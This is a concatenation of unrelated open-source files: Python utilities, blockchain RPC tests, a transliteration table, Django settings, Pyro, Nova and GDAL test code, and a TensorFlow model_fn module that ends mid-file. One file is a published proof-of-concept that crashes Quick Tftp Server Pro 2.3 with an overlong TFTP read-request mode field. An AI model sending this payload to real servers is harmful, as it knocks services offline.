v1=sp()
sa(v0)
sa(v1)
sa(2)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr());
return 1
m=[_0,_1,_2,_3,_4,_5,_6,_7,_8,_9,_10,_11,_12,_13,_14,_15,_16,_17,_18,_19,_20,_21,_22,_23,_24]
c=0
while c<25:
c=m[c]()
| mit |
nicko96/Chrome-Infra | infra_libs/infra_types/infra_types.py | 8 | 2255 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import operator
def freeze(obj):
"""Takes a generic object ``obj``, and returns an immutable version of it.
Supported types:
* dict / OrderedDict -> FrozenDict
* list -> tuple
* set -> frozenset
* any object with a working __hash__ implementation (assumes that hashable
means immutable)
Will raise TypeError if you pass an object which is not hashable.
"""
if isinstance(obj, dict):
return FrozenDict((freeze(k), freeze(v)) for k, v in obj.iteritems())
elif isinstance(obj, (list, tuple)):
return tuple(freeze(i) for i in obj)
elif isinstance(obj, set):
return frozenset(freeze(i) for i in obj)
else:
hash(obj)
return obj
def thaw(obj):
"""Takes an object from freeze() and returns a mutable copy of it."""
if isinstance(obj, FrozenDict):
return collections.OrderedDict(
(thaw(k), thaw(v)) for k, v in obj.iteritems())
elif isinstance(obj, tuple):
return list(thaw(i) for i in obj)
elif isinstance(obj, frozenset):
return set(thaw(i) for i in obj)
else:
return obj
class FrozenDict(collections.Mapping):
"""An immutable OrderedDict.
Modified From: http://stackoverflow.com/a/2704866
"""
def __init__(self, *args, **kwargs):
self._d = collections.OrderedDict(*args, **kwargs)
# Calculate the hash immediately so that we know all the items are
# hashable too.
self._hash = reduce(operator.xor,
(hash(i) for i in enumerate(self._d.iteritems())), 0)
def __eq__(self, other):
if not isinstance(other, collections.Mapping):
return NotImplemented
if self is other:
return True
if len(self) != len(other):
return False
for k, v in self.iteritems():
if k not in other or other[k] != v:
return False
return True
def __iter__(self):
return iter(self._d)
def __len__(self):
return len(self._d)
def __getitem__(self, key):
return self._d[key]
def __hash__(self):
return self._hash
def __repr__(self):
return 'FrozenDict(%r)' % (self._d.items(),)
| bsd-3-clause |
gkweb76/exploits | quicktftp_dos.py | 1 | 1472 | # Exploit Title: Quick Tftp Server Pro 2.3 TFTP mode Remote Overflow (DoS)
# Date: 21/01/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.tallsoft.com/tftpserver.htm
# Software Link: http://www.tallsoft.com/tftpserver_setup.exe
# Version: 2.3
# Tested on: Windows 7 Family x64 (FR)
# Category: DoS
"""
Disclosure Timeline:
--------------------
2016-01-21: Vulnerability discovered
2016-01-24: Vendor contacted
2016-01-29: Vendor contacted again (no answer)
2016-03-01: Vulnerability published
Description :
-------------
A remote overflow exists in Quick Tftp Server Pro 2.3 in the TFTP mode when sending a TFTP Read Request. This allows to remotely crash
the application, thus causing a Denial of Service.
Instructions:
-------------
- Starts Quick Tftp Server Pro 2.3
- Run this exploit locally or from your remote attacking machine
"""
import socket
host = "192.168.135.132"
port = 69
request = "\x00\x01" # TFTP Read Request (RRQ)
file = "file.txt"
mode = '\x41' * 1024 # Overflow
buffer = request + file + "\x00" + mode + "\x00"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print "[*] Sending buffer to %s (%d bytes)..." % (host, len(buffer))
s.sendto(buffer, (host, port))
s.close()
print "[*] Done."
except:
print "[-] Error connecting"
| mit |
LIMXTEC/BitCore | test/functional/blockchain.py | 1 | 5890 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test RPCs related to blockchainstate.
Test the following RPCs:
- gettxoutsetinfo
- getdifficulty
- getbestblockhash
- getblockhash
- getblockheader
- getchaintxstats
- getnetworkhashps
- verifychain
Tests correspond to code in rpc/blockchain.cpp.
"""
from decimal import Decimal
import http.client
import subprocess
from test_framework.test_framework import (BitcoinTestFramework, BITCORED_PROC_WAIT_TIMEOUT)
from test_framework.util import (
assert_equal,
assert_raises,
assert_raises_jsonrpc,
assert_is_hex_string,
assert_is_hash_string,
)
class BlockchainTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = False
self.num_nodes = 1
self.extra_args = [['-stopatheight=207']]
def run_test(self):
self._test_getchaintxstats()
self._test_gettxoutsetinfo()
self._test_getblockheader()
self._test_getdifficulty()
self._test_getnetworkhashps()
self._test_stopatheight()
assert self.nodes[0].verifychain(4, 0)
def _test_getchaintxstats(self):
chaintxstats = self.nodes[0].getchaintxstats(1)
# 200 txs plus genesis tx
assert_equal(chaintxstats['txcount'], 201)
# tx rate should be 1 per 10 minutes, or 1/600
# we have to round because of binary math
assert_equal(round(chaintxstats['txrate'] * 600, 10), Decimal(1))
def _test_gettxoutsetinfo(self):
node = self.nodes[0]
res = node.gettxoutsetinfo()
assert_equal(res['total_amount'], Decimal('8725.00000000'))
assert_equal(res['transactions'], 200)
assert_equal(res['height'], 200)
assert_equal(res['txouts'], 200)
assert_equal(res['bogosize'], 17000),
assert_equal(res['bestblock'], node.getblockhash(200))
size = res['disk_size']
assert size > 6400
assert size < 64000
assert_equal(len(res['bestblock']), 64)
assert_equal(len(res['hash_serialized_2']), 64)
self.log.info("Test that gettxoutsetinfo() works for blockchain with just the genesis block")
b1hash = node.getblockhash(1)
node.invalidateblock(b1hash)
res2 = node.gettxoutsetinfo()
assert_equal(res2['transactions'], 0)
assert_equal(res2['total_amount'], Decimal('0'))
assert_equal(res2['height'], 0)
assert_equal(res2['txouts'], 0)
assert_equal(res2['bogosize'], 0),
assert_equal(res2['bestblock'], node.getblockhash(0))
assert_equal(len(res2['hash_serialized_2']), 64)
self.log.info("Test that gettxoutsetinfo() returns the same result after invalidate/reconsider block")
node.reconsiderblock(b1hash)
res3 = node.gettxoutsetinfo()
assert_equal(res['total_amount'], res3['total_amount'])
assert_equal(res['transactions'], res3['transactions'])
assert_equal(res['height'], res3['height'])
assert_equal(res['txouts'], res3['txouts'])
assert_equal(res['bogosize'], res3['bogosize'])
assert_equal(res['bestblock'], res3['bestblock'])
assert_equal(res['hash_serialized_2'], res3['hash_serialized_2'])
def _test_getblockheader(self):
node = self.nodes[0]
assert_raises_jsonrpc(-5, "Block not found",
node.getblockheader, "nonsense")
besthash = node.getbestblockhash()
secondbesthash = node.getblockhash(199)
header = node.getblockheader(besthash)
assert_equal(header['hash'], besthash)
assert_equal(header['height'], 200)
assert_equal(header['confirmations'], 1)
assert_equal(header['previousblockhash'], secondbesthash)
assert_is_hex_string(header['chainwork'])
assert_is_hash_string(header['hash'])
assert_is_hash_string(header['previousblockhash'])
assert_is_hash_string(header['merkleroot'])
assert_is_hash_string(header['bits'], length=None)
assert isinstance(header['time'], int)
assert isinstance(header['mediantime'], int)
assert isinstance(header['nonce'], int)
assert isinstance(header['version'], int)
assert isinstance(int(header['versionHex'], 16), int)
assert isinstance(header['difficulty'], Decimal)
def _test_getdifficulty(self):
difficulty = self.nodes[0].getdifficulty()
# 1 hash in 2 should be valid, so difficulty should be 1/2**31
# binary => decimal => binary math is why we do this check
assert abs(difficulty * 2**31 - 1) < 0.0001
def _test_getnetworkhashps(self):
hashes_per_second = self.nodes[0].getnetworkhashps()
# This should be 2 hashes every 10 minutes or 1/300
assert abs(hashes_per_second * 300 - 1) < 0.0001
def _test_stopatheight(self):
assert_equal(self.nodes[0].getblockcount(), 200)
self.nodes[0].generate(6)
assert_equal(self.nodes[0].getblockcount(), 206)
self.log.debug('Node should not stop at this height')
assert_raises(subprocess.TimeoutExpired, lambda: self.bitcored_processes[0].wait(timeout=3))
try:
self.nodes[0].generate(1)
except (ConnectionError, http.client.BadStatusLine):
pass # The node already shut down before response
self.log.debug('Node should stop at this height...')
self.bitcored_processes[0].wait(timeout=BITCORED_PROC_WAIT_TIMEOUT)
self.nodes[0] = self.start_node(0, self.options.tmpdir)
assert_equal(self.nodes[0].getblockcount(), 207)
if __name__ == '__main__':
BlockchainTest().main()
| mit |
dgarciam/Sick-Beard | lib/unidecode/x090.py | 251 | 4631 | data = (
'Tui ', # 0x00
'Song ', # 0x01
'Gua ', # 0x02
'Tao ', # 0x03
'Pang ', # 0x04
'Hou ', # 0x05
'Ni ', # 0x06
'Dun ', # 0x07
'Jiong ', # 0x08
'Xuan ', # 0x09
'Xun ', # 0x0a
'Bu ', # 0x0b
'You ', # 0x0c
'Xiao ', # 0x0d
'Qiu ', # 0x0e
'Tou ', # 0x0f
'Zhu ', # 0x10
'Qiu ', # 0x11
'Di ', # 0x12
'Di ', # 0x13
'Tu ', # 0x14
'Jing ', # 0x15
'Ti ', # 0x16
'Dou ', # 0x17
'Yi ', # 0x18
'Zhe ', # 0x19
'Tong ', # 0x1a
'Guang ', # 0x1b
'Wu ', # 0x1c
'Shi ', # 0x1d
'Cheng ', # 0x1e
'Su ', # 0x1f
'Zao ', # 0x20
'Qun ', # 0x21
'Feng ', # 0x22
'Lian ', # 0x23
'Suo ', # 0x24
'Hui ', # 0x25
'Li ', # 0x26
'Sako ', # 0x27
'Lai ', # 0x28
'Ben ', # 0x29
'Cuo ', # 0x2a
'Jue ', # 0x2b
'Beng ', # 0x2c
'Huan ', # 0x2d
'Dai ', # 0x2e
'Lu ', # 0x2f
'You ', # 0x30
'Zhou ', # 0x31
'Jin ', # 0x32
'Yu ', # 0x33
'Chuo ', # 0x34
'Kui ', # 0x35
'Wei ', # 0x36
'Ti ', # 0x37
'Yi ', # 0x38
'Da ', # 0x39
'Yuan ', # 0x3a
'Luo ', # 0x3b
'Bi ', # 0x3c
'Nuo ', # 0x3d
'Yu ', # 0x3e
'Dang ', # 0x3f
'Sui ', # 0x40
'Dun ', # 0x41
'Sui ', # 0x42
'Yan ', # 0x43
'Chuan ', # 0x44
'Chi ', # 0x45
'Ti ', # 0x46
'Yu ', # 0x47
'Shi ', # 0x48
'Zhen ', # 0x49
'You ', # 0x4a
'Yun ', # 0x4b
'E ', # 0x4c
'Bian ', # 0x4d
'Guo ', # 0x4e
'E ', # 0x4f
'Xia ', # 0x50
'Huang ', # 0x51
'Qiu ', # 0x52
'Dao ', # 0x53
'Da ', # 0x54
'Wei ', # 0x55
'Appare ', # 0x56
'Yi ', # 0x57
'Gou ', # 0x58
'Yao ', # 0x59
'Chu ', # 0x5a
'Liu ', # 0x5b
'Xun ', # 0x5c
'Ta ', # 0x5d
'Di ', # 0x5e
'Chi ', # 0x5f
'Yuan ', # 0x60
'Su ', # 0x61
'Ta ', # 0x62
'Qian ', # 0x63
'[?] ', # 0x64
'Yao ', # 0x65
'Guan ', # 0x66
'Zhang ', # 0x67
'Ao ', # 0x68
'Shi ', # 0x69
'Ce ', # 0x6a
'Chi ', # 0x6b
'Su ', # 0x6c
'Zao ', # 0x6d
'Zhe ', # 0x6e
'Dun ', # 0x6f
'Di ', # 0x70
'Lou ', # 0x71
'Chi ', # 0x72
'Cuo ', # 0x73
'Lin ', # 0x74
'Zun ', # 0x75
'Rao ', # 0x76
'Qian ', # 0x77
'Xuan ', # 0x78
'Yu ', # 0x79
'Yi ', # 0x7a
'Wu ', # 0x7b
'Liao ', # 0x7c
'Ju ', # 0x7d
'Shi ', # 0x7e
'Bi ', # 0x7f
'Yao ', # 0x80
'Mai ', # 0x81
'Xie ', # 0x82
'Sui ', # 0x83
'Huan ', # 0x84
'Zhan ', # 0x85
'Teng ', # 0x86
'Er ', # 0x87
'Miao ', # 0x88
'Bian ', # 0x89
'Bian ', # 0x8a
'La ', # 0x8b
'Li ', # 0x8c
'Yuan ', # 0x8d
'Yao ', # 0x8e
'Luo ', # 0x8f
'Li ', # 0x90
'Yi ', # 0x91
'Ting ', # 0x92
'Deng ', # 0x93
'Qi ', # 0x94
'Yong ', # 0x95
'Shan ', # 0x96
'Han ', # 0x97
'Yu ', # 0x98
'Mang ', # 0x99
'Ru ', # 0x9a
'Qiong ', # 0x9b
'[?] ', # 0x9c
'Kuang ', # 0x9d
'Fu ', # 0x9e
'Kang ', # 0x9f
'Bin ', # 0xa0
'Fang ', # 0xa1
'Xing ', # 0xa2
'Na ', # 0xa3
'Xin ', # 0xa4
'Shen ', # 0xa5
'Bang ', # 0xa6
'Yuan ', # 0xa7
'Cun ', # 0xa8
'Huo ', # 0xa9
'Xie ', # 0xaa
'Bang ', # 0xab
'Wu ', # 0xac
'Ju ', # 0xad
'You ', # 0xae
'Han ', # 0xaf
'Tai ', # 0xb0
'Qiu ', # 0xb1
'Bi ', # 0xb2
'Pei ', # 0xb3
'Bing ', # 0xb4
'Shao ', # 0xb5
'Bei ', # 0xb6
'Wa ', # 0xb7
'Di ', # 0xb8
'Zou ', # 0xb9
'Ye ', # 0xba
'Lin ', # 0xbb
'Kuang ', # 0xbc
'Gui ', # 0xbd
'Zhu ', # 0xbe
'Shi ', # 0xbf
'Ku ', # 0xc0
'Yu ', # 0xc1
'Gai ', # 0xc2
'Ge ', # 0xc3
'Xi ', # 0xc4
'Zhi ', # 0xc5
'Ji ', # 0xc6
'Xun ', # 0xc7
'Hou ', # 0xc8
'Xing ', # 0xc9
'Jiao ', # 0xca
'Xi ', # 0xcb
'Gui ', # 0xcc
'Nuo ', # 0xcd
'Lang ', # 0xce
'Jia ', # 0xcf
'Kuai ', # 0xd0
'Zheng ', # 0xd1
'Otoko ', # 0xd2
'Yun ', # 0xd3
'Yan ', # 0xd4
'Cheng ', # 0xd5
'Dou ', # 0xd6
'Chi ', # 0xd7
'Lu ', # 0xd8
'Fu ', # 0xd9
'Wu ', # 0xda
'Fu ', # 0xdb
'Gao ', # 0xdc
'Hao ', # 0xdd
'Lang ', # 0xde
'Jia ', # 0xdf
'Geng ', # 0xe0
'Jun ', # 0xe1
'Ying ', # 0xe2
'Bo ', # 0xe3
'Xi ', # 0xe4
'Bei ', # 0xe5
'Li ', # 0xe6
'Yun ', # 0xe7
'Bu ', # 0xe8
'Xiao ', # 0xe9
'Qi ', # 0xea
'Pi ', # 0xeb
'Qing ', # 0xec
'Guo ', # 0xed
'Zhou ', # 0xee
'Tan ', # 0xef
'Zou ', # 0xf0
'Ping ', # 0xf1
'Lai ', # 0xf2
'Ni ', # 0xf3
'Chen ', # 0xf4
'You ', # 0xf5
'Bu ', # 0xf6
'Xiang ', # 0xf7
'Dan ', # 0xf8
'Ju ', # 0xf9
'Yong ', # 0xfa
'Qiao ', # 0xfb
'Yi ', # 0xfc
'Du ', # 0xfd
'Yan ', # 0xfe
'Mei ', # 0xff
)
| gpl-3.0 |
Puyb/inscriptions_roller | inscriptions/settings/docker.py | 1 | 1360 | from .default import *
import os
ALLOWED_HOSTS = os.environ.get('ALLOWED_HOSTS').split(',')
ADMINS = (
(environ.get('EMAIL_ADMIN', ''), environ.EMAIL_ADMIN),
)
DEBUG = environ.get('DEBUG', '') == 'True'
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG
if DEBUG:
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
EMAIL_HOST = environ.get('EMAIL_HOST', '')
EMAIL_PORT = environ.get('EMAIL_PORT', '')
EMAIL_HOST_USER = environ.get('EMAIL_HOST_USER', '')
EMAIL_HOST_PASSWORD = environ.get('EMAIL_HOST_PASSWORD', '')
DEFAULT_FROM_MAIL = environ.get('DEFAULT_FROM_MAIL', '')
IMAP_HOST = environ.get('IMAP_HOST', '')
IMAP_PORT = environ.get('IMAP_PORT', '')
IMAP_USER = environ.get('IMAP_USER', '')
IMAP_PASSWORD = environ.get('IMAP_PASSWORD', '')
MAPQUEST_API_KEY = environ.get('MAPQUEST_API_KEY', '')
CONTACT_MAIL = environ.get('CONTACT_MAIL', '')
if DEBUG:
INSTALLED_APPS.append('debug_toolbar')
INSTALLED_APPS.append('django_extensions')
MIDDLEWARE.insert(0, 'debug_toolbar.middleware.DebugToolbarMiddleware')
INTERNAL_IPS = ('127.0.0.1', )
DATABASES = {
"default": {
"ENGINE": "django.db.backends.postgresql_psycopg2",
"NAME": environ.get('DB_NAME', ''),
"USER": environ.get('DB_USER', ''),
"PASSWORD": environ.get('DB_PASSWORD', ''),
"HOST": environ.get('DB_HOST', ''),
}
}
| gpl-3.0 |
uber/pyro | pyro/infer/reparam/studentt.py | 1 | 1327 | # Copyright Contributors to the Pyro project.
# SPDX-License-Identifier: Apache-2.0
import pyro
import pyro.distributions as dist
from .reparam import Reparam
class StudentTReparam(Reparam):
"""
Auxiliary variable reparameterizer for
:class:`~pyro.distributions.StudentT` random variables.
This is useful in combination with
:class:`~pyro.infer.reparam.hmm.LinearHMMReparam` because it allows
StudentT processes to be treated as conditionally Gaussian processes,
permitting cheap inference via :class:`~pyro.distributions.GaussianHMM` .
This reparameterizes a :class:`~pyro.distributions.StudentT` by introducing
an auxiliary :class:`~pyro.distributions.Gamma` variable conditioned on
which the result is :class:`~pyro.distributions.Normal` .
"""
def __call__(self, name, fn, obs):
fn, event_dim = self._unwrap(fn)
assert isinstance(fn, dist.StudentT)
# Draw a sample that depends only on df.
half_df = fn.df * 0.5
gamma = pyro.sample("{}_gamma".format(name),
self._wrap(dist.Gamma(half_df, half_df), event_dim))
# Construct a scaled Normal.
loc = fn.loc
scale = fn.scale * gamma.rsqrt()
new_fn = self._wrap(dist.Normal(loc, scale), event_dim)
return new_fn, obs
| apache-2.0 |
klmitch/nova | nova/tests/functional/db/test_host_mapping.py | 6 | 8764 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_utils.fixture import uuidsentinel as uuids
from oslo_utils import uuidutils
from nova import context
from nova import exception
from nova import objects
from nova.objects import cell_mapping
from nova.objects import host_mapping
from nova import test
from nova.tests import fixtures
sample_mapping = {'host': 'fake-host',
'cell_mapping': None}
sample_cell_mapping = {'id': 1,
'uuid': '',
'name': 'fake-cell',
'transport_url': 'rabbit:///',
'database_connection': 'mysql:///'}
def create_cell_mapping(**kwargs):
args = sample_cell_mapping.copy()
if 'uuid' not in kwargs:
args['uuid'] = uuidutils.generate_uuid()
args.update(kwargs)
ctxt = context.RequestContext('fake-user', 'fake-project')
return cell_mapping.CellMapping._create_in_db(ctxt, args)
def create_mapping(**kwargs):
args = sample_mapping.copy()
args.update(kwargs)
if args["cell_mapping"] is None:
args["cell_mapping"] = create_cell_mapping()
args["cell_id"] = args.pop("cell_mapping", {}).get("id")
ctxt = context.RequestContext('fake-user', 'fake-project')
return host_mapping.HostMapping._create_in_db(ctxt, args)
def create_mapping_obj(context, **kwargs):
mapping = create_mapping(**kwargs)
return host_mapping.HostMapping._from_db_object(
context, host_mapping.HostMapping(), mapping)
class HostMappingTestCase(test.NoDBTestCase):
USES_DB_SELF = True
def setUp(self):
super(HostMappingTestCase, self).setUp()
self.useFixture(fixtures.Database(database='api'))
self.context = context.RequestContext('fake-user', 'fake-project')
self.mapping_obj = host_mapping.HostMapping()
self.cell_mapping_obj = cell_mapping.CellMapping()
def _compare_cell_obj_to_mapping(self, obj, mapping):
for key in [key for key in self.cell_mapping_obj.fields.keys()
if key not in ("created_at", "updated_at")]:
self.assertEqual(getattr(obj, key), mapping[key])
def test_get_by_host(self):
mapping = create_mapping()
db_mapping = self.mapping_obj._get_by_host_from_db(
self.context, mapping['host'])
for key in self.mapping_obj.fields.keys():
if key == "cell_mapping":
key = "cell_id"
self.assertEqual(db_mapping[key], mapping[key])
def test_get_by_host_not_found(self):
self.assertRaises(exception.HostMappingNotFound,
self.mapping_obj._get_by_host_from_db, self.context,
'fake-host2')
def test_update_cell_mapping(self):
db_hm = create_mapping()
db_cell = create_cell_mapping(id=42)
cell = cell_mapping.CellMapping.get_by_uuid(
self.context, db_cell['uuid'])
hm = host_mapping.HostMapping(self.context)
hm.id = db_hm['id']
hm.cell_mapping = cell
hm.save()
self.assertNotEqual(db_hm['cell_id'], hm.cell_mapping.id)
for key in hm.fields.keys():
if key in ('updated_at', 'cell_mapping'):
continue
model_field = getattr(hm, key)
if key == 'created_at':
model_field = model_field.replace(tzinfo=None)
self.assertEqual(db_hm[key], model_field, 'field %s' % key)
db_hm_new = host_mapping.HostMapping._get_by_host_from_db(
self.context, db_hm['host'])
self.assertNotEqual(db_hm['cell_id'], db_hm_new['cell_id'])
def test_destroy_in_db(self):
mapping = create_mapping()
self.mapping_obj._get_by_host_from_db(self.context,
mapping['host'])
self.mapping_obj._destroy_in_db(self.context, mapping['host'])
self.assertRaises(exception.HostMappingNotFound,
self.mapping_obj._get_by_host_from_db, self.context,
mapping['host'])
def test_load_cell_mapping(self):
cell = create_cell_mapping(id=42)
mapping_obj = create_mapping_obj(self.context, cell_mapping=cell)
cell_map_obj = mapping_obj.cell_mapping
self._compare_cell_obj_to_mapping(cell_map_obj, cell)
def test_host_mapping_list_get_by_cell_id(self):
"""Tests getting all of the HostMappings for a given CellMapping id.
"""
# we shouldn't have any host mappings yet
self.assertEqual(0, len(host_mapping.HostMappingList.get_by_cell_id(
self.context, sample_cell_mapping['id'])))
# now create a host mapping
db_host_mapping = create_mapping()
# now we should list out one host mapping for the cell
host_mapping_list = host_mapping.HostMappingList.get_by_cell_id(
self.context, db_host_mapping['cell_id'])
self.assertEqual(1, len(host_mapping_list))
self.assertEqual(db_host_mapping['id'], host_mapping_list[0].id)
class HostMappingDiscoveryTest(test.TestCase):
def _setup_cells(self):
ctxt = context.get_admin_context()
self.celldbs = fixtures.CellDatabases()
cells = []
for uuid in (uuids.cell1, uuids.cell2, uuids.cell3):
cm = objects.CellMapping(context=ctxt,
uuid=uuid,
database_connection=uuid,
transport_url='fake://')
cm.create()
cells.append(cm)
self.celldbs.add_cell_database(uuid)
self.useFixture(self.celldbs)
for cell in cells:
for i in (1, 2, 3):
# Make one host in each cell unmapped
mapped = 0 if i == 2 else 1
host = 'host-%s-%i' % (cell.uuid, i)
if mapped:
hm = objects.HostMapping(context=ctxt,
cell_mapping=cell,
host=host)
hm.create()
with context.target_cell(ctxt, cell):
cn = objects.ComputeNode(
context=ctxt, vcpus=1, memory_mb=1, local_gb=1,
vcpus_used=0, memory_mb_used=0, local_gb_used=0,
hypervisor_type='danvm', hypervisor_version='1',
cpu_info='foo',
cpu_allocation_ratio=1.0,
ram_allocation_ratio=1.0,
disk_allocation_ratio=1.0,
mapped=mapped, host=host)
cn.create()
def test_discover_hosts(self):
status = lambda m: None
ctxt = context.get_admin_context()
# NOTE(danms): Three cells, one unmapped host per cell
mappings = host_mapping.discover_hosts(ctxt, status_fn=status)
self.assertEqual(3, len(mappings))
# NOTE(danms): All hosts should be mapped now, so we should do
# no lookups for them
with mock.patch('nova.objects.HostMapping.get_by_host') as mock_gbh:
mappings = host_mapping.discover_hosts(ctxt, status_fn=status)
self.assertFalse(mock_gbh.called)
self.assertEqual(0, len(mappings))
def test_discover_hosts_one_cell(self):
status = lambda m: None
ctxt = context.get_admin_context()
cells = objects.CellMappingList.get_all(ctxt)
# NOTE(danms): One cell, one unmapped host per cell
mappings = host_mapping.discover_hosts(ctxt, cells[1].uuid,
status_fn=status)
self.assertEqual(1, len(mappings))
# NOTE(danms): Three cells, two with one more unmapped host
mappings = host_mapping.discover_hosts(ctxt, status_fn=status)
self.assertEqual(2, len(mappings))
# NOTE(danms): All hosts should be mapped now, so we should do
# no lookups for them
with mock.patch('nova.objects.HostMapping.get_by_host') as mock_gbh:
mappings = host_mapping.discover_hosts(ctxt, status_fn=status)
self.assertFalse(mock_gbh.called)
self.assertEqual(0, len(mappings))
| apache-2.0 |
ar4s/django | django/contrib/gis/gdal/tests/test_driver.py | 6 | 1147 | import unittest
from unittest import skipUnless
from django.contrib.gis.gdal import HAS_GDAL
if HAS_GDAL:
from django.contrib.gis.gdal import Driver, OGRException
valid_drivers = ('ESRI Shapefile', 'MapInfo File', 'TIGER', 'S57', 'DGN',
'Memory', 'CSV', 'GML', 'KML')
invalid_drivers = ('Foo baz', 'clucka', 'ESRI Shp')
aliases = {'eSrI' : 'ESRI Shapefile',
'TigER/linE' : 'TIGER',
'SHAPE' : 'ESRI Shapefile',
'sHp' : 'ESRI Shapefile',
}
@skipUnless(HAS_GDAL, "GDAL is required")
class DriverTest(unittest.TestCase):
def test01_valid_driver(self):
"Testing valid OGR Data Source Drivers."
for d in valid_drivers:
dr = Driver(d)
self.assertEqual(d, str(dr))
def test02_invalid_driver(self):
"Testing invalid OGR Data Source Drivers."
for i in invalid_drivers:
self.assertRaises(OGRException, Driver, i)
def test03_aliases(self):
"Testing driver aliases."
for alias, full_name in aliases.items():
dr = Driver(alias)
self.assertEqual(full_name, str(dr))
| bsd-3-clause |
zycdragonball/tensorflow | tensorflow/contrib/learn/python/learn/estimators/model_fn.py | 21 | 11316 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes and methods related to model_fn."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import six
from tensorflow.contrib import framework as contrib_framework
from tensorflow.contrib.framework import get_graph_from_inputs
from tensorflow.contrib.learn.python.learn.estimators import constants
from tensorflow.contrib.learn.python.learn.estimators import metric_key
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.python.estimator import model_fn as core_model_fn_lib
from tensorflow.python.estimator.export import export_output as core_export_lib
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.training import session_run_hook
class ModeKeys(object):
"""Standard names for model modes.
The following standard keys are defined:
* `TRAIN`: training mode.
* `EVAL`: evaluation mode.
* `INFER`: inference mode.
"""
TRAIN = 'train'
EVAL = 'eval'
INFER = 'infer'
@classmethod
def validate(cls, key):
if key not in (cls.TRAIN, cls.EVAL, cls.INFER):
raise ValueError('Invalid mode %s.' % key)
class ModelFnOps(
collections.namedtuple('ModelFnOps', [
'predictions', 'loss', 'train_op', 'eval_metric_ops',
'output_alternatives', 'training_chief_hooks', 'training_hooks',
'scaffold', 'mode'
])):
"""Ops returned from a model_fn."""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metric_ops=None,
output_alternatives=None,
training_chief_hooks=None,
training_hooks=None,
scaffold=None):
"""Creates a validated `ModelFnOps` instance.
For a multi-headed model, the predictions dict here will contain the outputs
of all of the heads. However: at serving time, requests will be made
specifically for one or more heads, and the RPCs used for these requests may
differ by problem type (i.e., regression, classification, other). The
purpose of the output_alternatives dict is to aid in exporting a SavedModel
from which such head-specific queries can be served. These
output_alternatives will be combined with input_alternatives (see
`saved_model_export_utils`) to produce a set of `SignatureDef`s specifying
the valid requests that can be served from this model.
For a single-headed model, it is still adviseable to provide
output_alternatives with a single entry, because this is how the problem
type is communicated for export and serving. If output_alternatives is not
given, the resulting SavedModel will support only one head of unspecified
type.
Args:
mode: One of `ModeKeys`. Specifies if this training, evaluation or
prediction.
predictions: Predictions `Tensor` or dict of `Tensor`.
loss: Training loss `Tensor`.
train_op: Op for the training step.
eval_metric_ops: Dict of metric results keyed by name. The values of the
dict are the results of calling a metric function, such as `Tensor`.
output_alternatives: a dict of
`{submodel_name: (problem_type, {tensor_name: Tensor})}`, where
`submodel_name` is a submodel identifier that should be consistent
across the pipeline (here likely taken from the name of each `Head`,
for models that use them), `problem_type` is a `ProblemType`,
`tensor_name` is a symbolic name for an output Tensor possibly but not
necessarily taken from `PredictionKey`, and `Tensor` is the
corresponding output Tensor itself.
training_chief_hooks: A list of `SessionRunHook` objects that will be
run on the chief worker during training.
training_hooks: A list of `SessionRunHook` objects that will be run on
all workers during training.
scaffold: A `tf.train.Scaffold` object that can be used to set
initialization, saver, and more to be used in training.
Returns:
A validated `ModelFnOps` object.
Raises:
ValueError: If validation fails.
"""
ModeKeys.validate(mode)
# Assert all ops are from the same graph.
get_graph_from_inputs((predictions, loss, train_op))
# Validate train_op.
if train_op is None:
if mode == ModeKeys.TRAIN:
raise ValueError('Missing train_op.')
elif not isinstance(train_op, ops.Operation):
# TODO(ptucker): Should this be allowed? Consider raising error.
train_op = ops.convert_to_tensor(train_op).op
# Validate loss.
if loss is None:
if mode in (ModeKeys.TRAIN, ModeKeys.EVAL):
raise ValueError('Missing loss.')
else:
loss = ops.convert_to_tensor(loss)
loss_shape = loss.get_shape()
if loss_shape.num_elements() not in (None, 1):
raise ValueError('Loss must be scalar: %s.' % loss)
if not loss_shape.is_compatible_with(tensor_shape.scalar()):
loss = array_ops.reshape(loss, [])
# Validate predictions.
if predictions is None:
if mode == ModeKeys.INFER or mode == ModeKeys.EVAL:
raise ValueError('Missing predictions.')
else:
if isinstance(predictions, dict):
predictions = {
k: contrib_framework.convert_to_tensor_or_sparse_tensor(v)
for k, v in six.iteritems(predictions)
}
else:
predictions = contrib_framework.convert_to_tensor_or_sparse_tensor(
predictions)
# Validate eval_metric_ops
if eval_metric_ops is None:
eval_metric_ops = {}
else:
if not isinstance(eval_metric_ops, dict):
